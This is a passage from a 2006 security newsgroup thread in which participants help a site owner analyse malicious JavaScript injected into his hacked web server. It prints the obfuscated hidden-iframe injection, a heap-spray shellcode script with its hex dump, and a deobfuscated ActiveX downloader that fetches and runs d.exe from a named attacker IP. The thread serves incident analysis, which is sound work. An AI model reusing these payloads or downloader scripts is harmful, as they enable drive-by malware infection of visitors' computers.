Malicious javascript obfuscation
Wong Yung

2006-10-23, 1:19 am

Hi

Recently the webserver my page is on was hacked. Someone put in some
malicious javascript which I believe redirects the browser to another
webpage. I want to go to the URL directly using something like links
on Linux or Safari on Mac (as I have a strong suspicion it's probably
exploiting some IE vulnerability or trying to download some Windows
trojan) to work out what exactly it was trying to do. However it looks
like the URL was obfuscated:

[quote]
s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
[/quote]

Is there any tool I can use to work out what the URL is from this?

Thanks!

Todd H.

2006-10-23, 1:19 am

"Wong Yung" <wongyung_peach@yahoo.com> writes:

> Hi
>
> Recently the webserver my page is on was hacked. Someone put in some
> malicious javascript which I believe redirects the browser to another
> webpage. I want to go to the URL directly using something like links
> on Linux or Safari on Mac (as I have a strong suspicion it's probably
> exploiting some IE vulnerability or trying to download some Windows
> trojan) to work out what exactly it was trying to do. However it looks
> like the URL was obfuscated:
>
> [quote]
> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
> [/quote]
>
> Is there any tool I can use to work out what the URL is from this?


It's javascript so a web browser is all you need.

It's a rot 4 encoding if you will. It's just taking each of the
characters of that string s and subtracting 4 from it
i.e. s.charCodeAt(i)-4

By changing document.write(o) to an alert() call you can see what it
says.

It translates to

<iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">


And that page appears to redirect somewhere else.

<a
href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>



--
Todd H.
http://www.toddh.net/
Wong Yung

2006-10-23, 1:19 am


Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/


Thanks very much Todd!

I went to the webpage and it's very strange. It doesn't seem to
attempt to download anything. They (kaonline.biz) claim that someone
is trying to blackmail them by sending spam in their name and then
trying to extort money from them. If this is true and they are not
lying their heads off I wonder if this is part of the supposed
extortion attempt. Or maybe they're just saying that because really
they are spammers and...*Sigh* I don't know what to believe anymore.

Still this is only what it is doing *now*. The webserver looks like it
has been hacked for a while now and god knows what's been happening in
the meantime.

Thanks though for helping out!

Todd H.

2006-10-23, 1:19 am

"Wong Yung" <wongyung_peach@yahoo.com> writes:

> Thanks very much Todd!
>
> I went to the webpage and it's very strange. It doesn't seem to
> attempt to download anything. They (kaonline.biz) claim that someone
> is trying to blackmail them by sending spam in their name and then
> trying to extort money from them. If this is true and they are not
> lying their heads off I wonder if this is part of the supposed
> extortion attempt. Or maybe they're just saying that because really
> they are spammers and...*Sigh* I don't know what to believe anymore.
>
> Still this is only what it is doing *now*. The webserver looks like it
> has been hacked for a while now and god knows what's been happening in
> the meantime.
>
> Thanks though for helping out!


No problem.

Was your webhost based on cpanel.net software? A few weeks ago, a
whole bunch of cpanel based sites got owned and were used largely to
spread the Internet Explorer 0day exploit du jour. I think that
issue has been patched but it did affect a lot of folks. Curious if
you were one of em.

Best Regards,
--
Todd H.
http://www.toddh.net/
Wong Yung

2006-10-23, 7:17 am


Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
>
> No problem.
>
> Was your webhost based on cpanel.net software? A few weeks ago, a
> whole bunch of cpanel based sites got owned and were used largely to
> spread the Internet Explorer 0day exploit dujour. I think that
> issue has been patched but it did affect a lot of folks. Curious if
> you were one of em.
>
> Best Regards,
> --
> Todd H.
> http://www.toddh.net/



No,

I think the webserver was running Apache on Linux (I say "I think"
because I wasn't admining it so I don't know what exactly was running
on the computer). The problem is it wasn't updated and so I guess in
the end you can say it was all our own fault.

*Sigh* I'm still worried though because even though it looks like the
hack is fairly harmless now it looks like it was hacked a while ago and
who knows if they hadn't taken the opportunity to download Trojans onto
a few computers first. You know how it is with security - once one
thing gets compromised everything touching it is tainted because you
can't be sure what the hackers were doing.

Usually I run either Linux (most of these redirect things lead to some
Windows specific malware) or Windows with Firefox with the NoScript
extension which blocks all javascript except on sites you whitelist.
However, I *did* test my website in IE several times when the script
was present so I could make sure the css looked OK. Nor did I turn off
scripting in IE because I hardly ever use it and I didn't think my own
website would be a security risk. Not sure what to do now...probably
run a full anti-virus and anti-spyware check but you know that doesn't
catch everything. On the bright side of things I don't remember any
anti-virus alerts, or probably more importantly any warnings about
something trying to replace program x with a different version (I have
a program which detects when program files get changed) when I was
looking at my site in IE...

Anyway, thanks a lot for your help. It did help relieve my mind a lot.

Wong Yung

2006-10-23, 7:17 am

Todd H. wrote:
> "Wong Yung" <wongyung_peach@yahoo.com> writes:
>
> lxA4$wx}piA&hmwtpe}>rsri&B';o='';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4
>
> By changing document.write(o) to an alert() call you can see what it
> says.
>
> It translates to
>
> <iframe src="http://e7da7.in/out.php?s_id=1" width=0 border=0 height=0 style="display:none">
>
>
> And that page appears to redirect somewhere else.
>
> <a
> href="http://kaonline.biz/redirect.php?a=/&b=ACURIOUSLONGSTRINGOFHEXCHARACTERS">Click here to enter the site </a>
>
>
>
> --
> Todd H.
> http://www.toddh.net/



Actually looking more closely at it there seems to be something else
going on as well. If I use links, it does exactly as you say.
However, using Opera, Firefox or Konqueror what it does is goes to a
webpage with


<script>var
s=unescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
do{s+=s;}while(s.length<0x0900000);s+=unescape
(" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320
%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2
%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B
%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B
%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A
%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B
%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40
%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304
%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF
%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D
%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF
%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF
%u7468%u7074%u2F3A%u362F%u2E36%u3633%u322E%u3134%u322E
%u3334%u642F%u652E%u6578");</script></head><body><embed
src="hacked3_files/-----------------------------------------------------------.html">

(I named the file hacked3.html)

The
"hacked3_files/-----------------------------------------------------------.html"
is a html file with:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>403 Forbidden</TITLE>
</HEAD><BODY>
<H1>Forbidden</H1>
You don't have permission to access /expd/----------- (the hyphens
continue forever)
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLAAANNNNOOOOAAAQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ0000111122223333444455556666777788889999.wmv
on this server.<P>
<P>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle
the request.
<HR>
<ADDRESS>Apache/1.3.37 Server at 66.36.241.243 Port 80</ADDRESS>
</BODY></HTML>

So it looks like on Konqueror/Firefox/Opera it was trying to download a
wmv file (which no longer exists on the server). On links however it
seems to go to an entirely different webpage, the one which as you
point out tries to go to http://kaonline.biz/.

Ant

2006-10-24, 1:24 am

"Wong Yung" wrote:

> Actually looking more closely at it there seems to be something else
> going on as well. If I use links, it does exactly as you say.
> However, using Opera, Firefox or Konqueror what it does is goes to a
> webpage with
>
> <script>var
> s=unescape(" %u4141%u4141%u4141%u4141%u4141%u4141%u41
41%u4141");
> do{s+=s;}while(s.length<0x0900000);s+=unescape
> (" %u54EB%u758B%u8B3C%u3574%u0378%u56F5%u76
8B%u0320

[snip]

That variable "s" is storing executable code. The script inserts at
least 9437184 "A" characters (a NOP sled of 0x41), followed by code
which looks like this when dumped out in hex/ascii:

0000 EB 54 8B 75 3C 8B 74 35 78 03 F5 56 8B 76 20 03 .T.u<.t5x..V.v .
0010 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 74 .3.IA.3.6...(8.t
0020 08 C1 CB 0D 03 DA 40 EB EF 3B DF 75 E7 5E 8B 5E ......@..;.u.^.^
0030 24 03 DD 66 8B 0C 4B 8B 5E 1C 03 DD 8B 04 8B 03 $..f..K.^.......
0040 C5 C3 75 72 6C 6D 6F 6E 2E 64 6C 6C 00 43 3A 5C ..urlmon.dll.C:\
0050 55 2E 65 78 65 00 33 C0 64 03 40 30 78 0C 8B 40 U.exe.3.d.@0x..@
0060 0C 8B 70 1C AD 8B 40 08 EB 09 8B 40 34 8D 40 7C ..p...@....@4.@|
0070 8B 40 3C 95 BF 8E 4E 0E EC E8 84 FF FF FF 83 EC .@<...N.........
0080 04 83 2C 24 3C FF D0 95 50 BF 36 1A 2F 70 E8 6F ..,$<...P.6./p.o
0090 FF FF FF 8B 54 24 FC 8D 52 BA 33 DB 53 53 52 EB ....T$..R.3.SSR.
00A0 24 53 FF D0 5D BF 98 FE 8A 0E E8 53 FF FF FF 83 $S..]......S....
00B0 EC 04 83 2C 24 62 FF D0 BF 7E D8 E2 73 E8 40 FF ...,$b...~..s.@.
00C0 FF FF 52 FF D0 E8 D7 FF FF FF 68 74 74 70 3A 2F ..R.......http:/
00D0 2F 36 36 2E 33 36 2E 32 34 31 2E 32 34 33 2F 64 /66.36.241.243/d
00E0 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 00 .exe............

I'm guessing it would use urlmon.dll to download the file "d.exe" from
66.36.241.243, which is a small executable packed using FSG. There's
also a reference to a file "C:\U.exe".

> The
> "hacked3_files/-----------------------------------------------------------.html"
> is a html file with:


[...]

> AAAABBBB [snip] NNNNOOOOAAA [snip] 88889999.wmv


The part between my snips had a control character (0x05) either side
of it. I don't know the reason for that.

[...]

> So it looks like on Konqueror/Firefox/Opera it was trying to download a
> wmv file (which no longer exists on the server). On links however it
> seems to go to an entirely different webpage, the one which as you
> point out tries to go to http://kaonline.biz/.


It appears to be an exploit involving a wmv vulnerability, but I don't
know how the binary code in the script variable "s" gets to be run.

Also spotted here:
http://www.castlecops.com/p842233-P...MV_exploit.html


Wong Yung

2006-10-24, 1:24 am


Ant wrote:
> "Wong Yung" wrote:


>
>
> It appears to be an exploit involving a wmv vulnerability, but I don't
> know how the binary code in the script variable "s" gets to be run.
>
> Also spotted here:
> http://www.castlecops.com/p842233-P...MV_exploit.html



Wow. Thanks very much for the info. And thanks heaps for
unobfuscating the stuff in javascript. Hmmm...looking at the
castlecops link it looks like we aren't the only ones who were hacked
using the same thing. Do you have any idea why links goes to
kaonline.biz? I'm trying to work out what role they play in all of
this.

Ant

2006-10-25, 1:36 am

"Wong Yung" wrote:

> Wow. Thanks very much for the info. And thanks heaps for
> unobfuscating the stuff in javascript. Hmmm...looking at the
> castlecops link it looks like we aren't the only ones who were hacked
> using the same thing. Do you have any idea why links goes to
> kaonline.biz? I'm trying to work out what role they play in all of
> this.


I don't know if they are involved. They say they're being attacked,
so you could report it to them, but as far as I can tell there is no
exploit if the redirect is to kaonline.biz.

If I use wget on the "e7da7.in" link, I get redirected to kaonline.
However, if I use telnet, the redirection is to:
ht_p://66.36.241.243/expd/index.php
(I've munged the "http" in case anyone's click-happy)

That's where the malicious code is, and I found a different (and more
obfuscated) exploit to what you posted before.

Where you are redirected, and what exploit is served up probably
depends on the user-agent header of the http request.


Wong Yung

2006-10-27, 1:25 am


Ant wrote:
> "Wong Yung" wrote:
>
>
> I don't know if they are involved. They say they're being attacked,
> so you could report it to them, but as far as I can tell there is no
> exploit if the redirect is to kaonline.biz.
>
> If I use wget on the "e7da7.in" link, I get redirected to kaonline.
> However, if I use telnet, the redirection is to:
> ht_p://66.36.241.243/expd/index.php
> (I've munged the "http" in case anyone's click-happy)
>
> That's where the malicious code is, and I found a different (and more
> obfuscated) exploit to what you posted before.
>
> Where you are redirected, and what exploit is served up probably
> depends on the user-agent header of the http request.


*Sigh* I couldn't get a nice simple evil guy could I? BTW what is this
other more obfuscated exploit that you found?

Ant

2006-10-28, 1:35 am

"Wong Yung" wrote:

> *Sigh* I couldn't get a nice simple evil guy could I?


Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.

> BTW what is this other more obfuscated exploit that you found?


There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...

[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]

So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.


Sebastian Gottschalk

2006-10-28, 1:35 am

Ant wrote:

>
> Many of the malware writers today are funded by organized crime, and
> the software is getting more sophisticated. It's not so much hackers
> having fun anymore.


Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
script that used its very own URL (retrieved by document.location) as a
part of the self-decryption - anyone who didn't care for the URL anymore
after 4 redirects (each with a new obfuscation) and didn't store it, had a
little problem.
At the end, the last obfuscation layer outputted a script in a broken way,
so it didn't work correctly. But one could still figure out what it did -
and among many classical IE "exploits" one could actually find two new
ones. Reported them to Microsoft quickly, and a patch was never issued.
Business as usual.

> So here is another method of downloading "d.exe" from the same IP
> address as before, then using the ADODB.Stream cross-domain exploit
> to save the file as "tm.exe" and run it in the context of the local
> machine. MS patched this particular vulnerability some time ago.


Not quite true. One can sometimes trigger to download new or old versions
of existing ActiveX controls (ignoring IE's settings), and then make such
exploits work again. Even aside from that, just invoking an ActiveX control
without any possibility to access its scripting, can have devastating side
effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
made Windows 2000 Server SP3 start the Telnet Server Service if installed.
Wong Yung

2006-10-28, 1:35 am


Sebastian Gottschalk wrote:
> Ant wrote:
>
>
> Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
> script that used its very own URL (retrieved by document.location) as a
> part of the self-decryption - anyone who didn't care for the URL anymore
> after 4 redirects (each with a new obfuscation) and didn't store it, had a
> little problem.
> At the end, the last obfuscation layer outputted a script in a broken way,
> so it didn't work correctly. But one could still figure out what it did -
> and among many classical IE "exploits" one could actually find two new
> ones. Reported them to Microsoft quickly, and a patch was never issued.
> Business as usual.
>
>
> Not quite true. One can sometimes trigger to download new or old versions
> of existing ActiveX controls (ignoring IE's settings), and then make such
> exploits work again. Even aside from that, just invoking an ActiveX control
> without any possibility to access its scripting, can have devastating side
> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
> made Windows 2000 Server SP3 start the Telnet Server Service if installed.


Now I'm getting scared...So how can I be sure there isn't any nasty
stuff on my computer as a result of this? I've run a full antivirus
check, a full antispyware check and a full anti-trojan check using
Trojan Hunter and these programs at least say I'm clean. I am fully
patched up (I always install the updates as soon as they become
available). And I've run netstat and it doesn't show any strange
internet connections and my firewall doesn't show any strange
connections though of course it could be piggying-back on another
program. *Sigh* Who'd thought that you'd get infected from your own
webpage.

Sebastian Gottschalk

2006-10-28, 7:24 am

Wong Yung wrote:

> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


Comparing all relevant system binaries against a baseline set of checksums?

Anyway, you said you're using Safari or Links (eh... try Links2). Those
don't know anything about ActiveX - only IE is vulnerable. Maybe also
Mozilla with the ActiveX plugin intentionally installed, but even then
you'd have to explicitly whitelist vulnerable controls in first place.

> I've run a full antivirus check, a full antispyware check and a full
> anti-trojan check using Trojan Hunter and these programs at least say I'm clean.


Which means exactly nothing.

> I am fully patched up (I always install the updates as soon as they become
> available).


Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
you're not running Windows Server 2003), this means about nothing.

> And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.


As already mentioned: If you didn't use IE, there's no reason why you would
have any problem at all.

> *Sigh* Who'd thought that you'd get infected from your own webpage.


At least for IE, any user should think so: It's stated in the manual! [1]



[1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
Caching Protection". It describes how you can activate a totally incomplete
solution to an inherent design problem that makes cross-site-scripting
trivially possible, in conjunction with the default full trust in the
Windows Update website as the XSS target giving every website full access
to all security-critical functions of IE.
Wong Yung

2006-10-28, 7:24 am


Sebastian Gottschalk wrote:
> Wong Yung wrote:
>
>
> Comparing all relevant system binaries against a baseline set of checksums?
>
> Anyway, you said you're using Safari or Links (eh... try Links2). Those
> don't know anything about ActiveX - only IE is vulnerable. Maybe also
> Mozilla with the ActiveX plugin intentionally installed, but even then
> you'd have to explicitly whitelist vulnerable controls in first place.
>
>
> Which means exactly nothing.
>
>
> Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
> you're not running Windows Server 2003), this means about nothing.
>
>
> As already mentioned: If you didn't use IE, there's no reason why you would
> have any problem at all.
>
>
> At least for IE, any user should think so: It's stated in the manual! [1]
>
>
>
> [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
> Caching Protection". It describes how you can activate a totally incomplete
> solution to an inherent design problem that makes cross-site-scripting
> trivially possible, in conjunction with the default full trust in the
> Windows Update website as the XSS target giving every website full access
> to all security-critical functions of IE.


I use Linux at work but at home I have Windows XP. Usually I use
Firefox. However, as I was changing some things on my site I thought
that I should check that it works in IE as well (you know IE and
css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
the plague but I thought, hey it's my own homepage, should be safe.
Right? Unfortunately I had IE on the default Moderate Security setting
because I never use IE.

*Sigh*

Wong Yung

2006-10-28, 7:24 am


Wong Yung wrote:

>
> I use Linux at work but at home I have Windows XP. Usually I use
> Firefox. However, as I was changing some things on my site I thought
> that I should check that it works in IE as well (you know IE and
> css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
> the plague but I thought, hey it's my own homepage, should be safe.
> Right? Unfortunately I had IE on the default Moderate Security setting
> because I never use IE.
>
> *Sigh*


Oh yeah, I forgot to mention. I may use Linux at work but practically
everyone else uses Windows XP with IE. And of course they visit the
hacked webpage fairly regularly which is actually not really my
personal personal webpage but more like the webpage for the entire
group (when I talk about my homepage I'm talking about my personal page
in this larger group site) so they go there to say get the latest news
and whatnot. I do too but I usually do so at work in Linux or if I'm
at home using Windows using Firefox (the only time I used IE was for 2
minutes once to check whether the css was screwed up or not. Sadly
enough that may be all that was required to get myself hacked...).
Most of the other people at work go there in Windows using IE. So as
you can see, there is quite a lot of potential for trouble here...

Ant

2006-10-29, 1:16 pm

"Wong Yung" wrote:

> Sebastian Gottschalk wrote:
>
> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


You could start by looking for those files mentioned in the exploits
(u.exe, d.exe and tm.exe), although sometimes the malware will delete
the initial files once it's installed.

> I've run a full antivirus
> check, a full antispyware check and a full anti-trojan check using
> Trojan Hunter and these programs at least say I'm clean. I am fully
> patched up (I always install the updates as soon as they become
> available). And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggying-back on another
> program.


If there's no unusual activity you are probably ok, but unless you're
very familiar with your system the only sure way is to reformat the HD
and reinstall the OS.

There's now an 'ADODB.connection' vulnerability which has just been
discovered. See http://isc.sans.org/diary.php?storyid=1807

Next time you use IE on the Internet, be sure to disable ActiveX
completely.


Sebastian Gottschalk

2006-10-29, 1:16 pm

Ant wrote:

> Next time you use IE on the Internet, be sure to disable ActiveX
> completely.


Doesn't matter. There are various unpatched buffer overflows which can be
triggered without any ActiveX or Scripting. In any case, you're pissed off.
Ant

2006-10-29, 1:16 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> Doesn't matter. There are various unpatched buffer overflows which can be
> triggered without any ActiveX or Scripting.


Well, that doesn't surprise me.

> In any case, you're pissed off.


What do you mean by that? I'm quite content, thanks.


erewhon

2006-10-29, 1:16 pm


>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4


Can you explain the process/tools you use - I'm no code head but am
impressed by this type of work


Sebastian Gottschalk

2006-10-29, 7:23 pm

erewhon wrote:

>
> Can you explain the process/tools you use - I'm no code head but am
> impressed by this type of work


Huh? This is absolutely trivial to understand. At best, you'd just need to
replace document.write(o) with f.e. prompt('','',o); or
document.write('<pre>'+o+'</pre>'); to get the decoded output written as
text-only, without any care for the encoding used.
Sebastian Gottschalk

2006-11-01, 7:28 pm

Ant wrote:

> "Sebastian Gottschalk" wrote:
>
>
> Well, that doesn't surprise me.
>
>
> What do you mean by that? I'm quite content, thanks.


Well, it doesn't matter with what caliber you get shot. The bad guys aren't
so dumb to only try old, already patched vulnerabilities.
Ant

2006-11-02, 7:22 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> Well, it doesn't matter with what caliber you get shot. The bad guys aren't
> so dumb to only try old, already patched vulnerabilities.


I wasn't "shot", and even if I had been, I wouldn't be "pissed off".


Sebastian Gottschalk

2006-11-02, 7:22 pm

Ant wrote:

> "Sebastian Gottschalk" wrote:
>
>
> I wasn't "shot"


My English isn't that bad that I wouldn't understand that "you" also means
"someone".

> , and even if I had been, I wouldn't be "pissed off".


Oh, sure. Out of the unpatched vulnerabilities in MSIE, a lot allow code
execution and can't be worked around by any configuration. I'd say goodbye
to %userprofile%.
Ant

2006-11-03, 1:28 am

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> My English isn't that bad that I wouldn't understand that "you" also means
> "someone".


Your English is way better than my German, but I'm not sure why you
use the term "pissed off". In the UK it means annoyed or fed-up.

>
> Oh, sure. Out of the unpatched vulnerabilities in MSIE, a lot allow code
> execution and can't be worked around by any configuration. I'd say goodbye
> to %userprofile%.


I had a couple of nasties sneak in a long time ago, but I wasn't
pissed off. They were temporary interruptions which I quickly fixed.


Sebastian Gottschalk

2006-11-03, 1:28 am

Ant wrote:

> "Sebastian Gottschalk" wrote:
>
>
> Your English is way better than my German, but I'm not sure why you
> use the term "pissed off". In the UK it means annoyed or fed-up.


My fault, I guess "XXXXed" or "XXXXed up" would have been more appropriate
(beside being a bit vulgar).

>
> I had a couple of nasties sneak in a long time ago, but I wasn't
> pissed off. They were temporary interruptions which I quickly fixed.


This is, of course, nonsense. Without any baseline system as comparison
(f.e. cryptographic checksums), every data the user had access to might be
and should reasonably be assumed as being compromised. There is no such
thing like a quick fix. Your system is most likely still compromised
without you having any chance to detect it.
Ant

2006-11-03, 7:23 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> My fault, I guess "XXXXed" or "XXXXed up" would have been more appropriate
> (beside being a bit vulgar).


Yes, that would make more sense.

>
> This is, of course, nonsense.


No, it isn't.

> Without any baseline system as comparison (f.e. cryptographic
> checksums), every data the user had access to might be and should
> reasonably be assumed as being compromised.


Yes, that's reasonable for unknown malware. However, I knew what hit
me, knew how far it got into the system and what it did, and knew how
to clean it up.

> There is no such thing like a quick fix.


For me, there was.

> Your system is most likely still compromised without you having any
> chance to detect it.


It most certainly is not.


Sebastian Gottschalk

2006-11-04, 7:19 am

Ant wrote:

>
> No, it isn't.


It is. As long as you don't have strict evidence that no data were altered,
you should assume it being so.

>
> Yes, that's reasonable for unknown malware. However, I knew what hit
> me, knew how far it got into the system and what it did, and knew how
> to clean it up.


I claim that you really don't know the malware. Some suggestions:
- The malware did something special, then modified itself to represent a
known malware.
- You only compared by signatures, leaving out minor modifications.
- Most malware downloads additional malware.
- Most malware opens backdoors, which then allow the attacker to do any
kind of modification, add new code, ...
- The malware itself used a vulnerability. You should assume that other,
unknown malware used the very same one.

>
> For me, there was.


Well, you should reflect about the meaning of "fix".

>
> It most certainly is not.


So, do you have any evidence to delude the null hypothesis?
erewhon

2006-11-04, 7:19 am


> - The malware did something special, then modified itself to represent a
> known malware.
> - You only compared by signatures, leaving out minor modifications.
> - Most malware downloads additional malware.
> - Most malware opens backdoors, which then allow the attacker to do any
> kind of modification, add new code, ...
> - The malware itself used a vulnerability. You should assume that other,
> unknown malware used the very same one.


Agreed

The only sure-fire fix is:

1. Format
2. Rebuild the os
3. Patch to the latest
4. Ensure firewall policies lock access

This is the only way to clean such an exploit infection.

Even this will not prevent the next 0day exploit.


Sebastian Gottschalk

2006-11-04, 7:19 am

erewhon wrote:

> The only sure-fire fix is:
>
> 1. Format
> 2. Rebuild the os
> 3. Patch to the latest
> 4. Ensure firewall policies lock access


Another, more usable method is checksums and a good backup system. Once
you have checked all relevant system binaries, the user's profile and all
his programs against a known safe set of checksums, and carefully replaced
the changes, you can boot up the system again. Now you can log in and check the
rest of the data (other users' profiles and programs, all other data) in
the background while getting back to normal.

Or you can simply restore the last backup state, without caring about detecting
the modifications, more easily but at the expense of more time.

> Even this will not prevent the next 0day exploit.


There's nothing that can prevent random errors.

Ant

2006-11-04, 1:16 pm

"Sebastian Gottschalk" wrote:

>
> It is. As long as you don't have strict evidence that no data were altered,
> you should assume it being so.


I do assume the worst until I've investigated.

>
> I claim that you really don't know the malware.


I know you are wrong.

> Some suggestions:
> - The malware did something special, then modified itself to represent a
> known malware.


It did not.

> - You only compared by signatures, leaving out minor modifications.


I did not.

> - Most malware downloads additional malware.


These did not.

> - Most malware opens backdoors, which then allow the attacker to do any
> kind of modification, add new code, ...


These did not.

> - The malware itself used a vulnerability. You should assume that other,
> unknown malware used the very same one.


One got in by my having port 445 listening for SMB & RPC (now closed),
another by clicking on something when I should have known better, and
the last by me fooling around with a known malware sample from my
collection.

In all cases I knew immediately what had happened and cleaned up there
and then.

>
> Well, you should reflect about the meaning of "fix".


No need. I know my system inside-out.

>
> So, do you have any evidence to delude the null hypothesis?


I don't see how I can give evidence of a clean machine; you would
have to inspect it. Having years of experience with computers and
software (before MS entered the field), and complete familiarity with
my system, I know I'm not compromised. In addition, I connect to the
net for very short periods with an external dial-up modem and watch
the (slow) traffic. Any unusual activity, and I can hit the "off"
button and investigate.

Since I've tightened up my security, restricting what IE can do, and
generally being more careful, I've had no problems at all.


Sebastian Gottschalk

2006-11-04, 7:26 pm

Ant wrote:

>
> One got in by my having port 445 listening for SMB & RPC (now closed),
> another by clicking on something when I should have known better, and
> the last by me fooling around with a known malware sample from my
> collection.


The first ones provided full system access to the malware, your claims
therefore are delusive and nothing else.

>
> I don't see how I can can give evidence of a clean machine; you would
> have to inspect it.


I was asking if you had evidence. Evidence for a clean machine f.e. would
be a successful comparison of all system binaries and data against a
well-known clean state, giving reasonable explanations for all
differences.

> Since I've tightened up my security, restricting what IE can do, and
> generally being more careful, I've had no problems at all.


No, this is where you lost every sound of professionality. There is no way
to configure MSIE to be safe even against all known unpatched
vulnerabilities, not even talking about being usable.

Ant

2006-11-05, 1:16 pm

"Sebastian Gottschalk" wrote:

> Ant wrote:
>
> The first ones provided full system access to the malware, your claims
> therefore are delusive and nothing else.


Rubbish. I know how my system behaves and what's running on it.

>
> I was asking if you had evidence. Evidence for a clean machine f.e. would
> be a successful comparison of all system binaries and data against a
> well-known clean state with giving reasonable explanations for all
> differences.


I've compared enough system files and checked all registry entries
from which stuff can be launched to satisfy myself that all is well.

>
> No this is where you lost every sound of professionality. There is no way
> to configure MSIE to be safe just even against all known unpatched
> vulnerabilities, not even talking about being usable.


It's safe enough given the configuration of my O/S and my surfing
habits. If this were a business-critical machine, I might be more
concerned. However, it's a home PC which contains nothing of value and
no sensitive information. It goes online for only very brief periods,
and during that time I know it's not transmitting rogue packets.


Sebastian Gottschalk

2006-11-05, 1:16 pm

Ant wrote:

> and checked all registry entries from which stuff can be launched


Now you've lost the last sound of professionality.

>
> It's safe enough given the the configuration of my O/S and my surfing
> habits.


Bullshit. It's unsafe at any rate.

> However, it's a home PC which contains nothing of value and
> no sensitive information.


Stupid. What about resources?

> It goes online for only very brief periods,
> and during that time I know it's not transmitting rogue packets.


You should refrain from claiming that you know something that can't be
known ever.

erewhon

2006-11-05, 1:16 pm

It is possible to insert a piece of malicious code, subsequent to gaining
access via the initial exploit code, and such code can be hidden by a
rootkit, can sit as a hidden process or as a time-activated piece of
code, and wait till an internet connection is available to stream out cached
